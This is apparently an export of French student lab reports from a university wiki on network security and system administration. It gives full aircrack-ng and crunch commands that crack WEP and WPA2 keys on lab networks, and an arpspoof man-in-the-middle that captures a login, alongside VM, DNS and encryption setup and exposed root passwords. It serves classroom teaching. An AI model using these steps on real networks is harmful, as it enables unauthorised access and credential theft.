Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54017</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54017"/>
				<updated>2020-11-27T17:18:28Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Configuration gandi.net */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
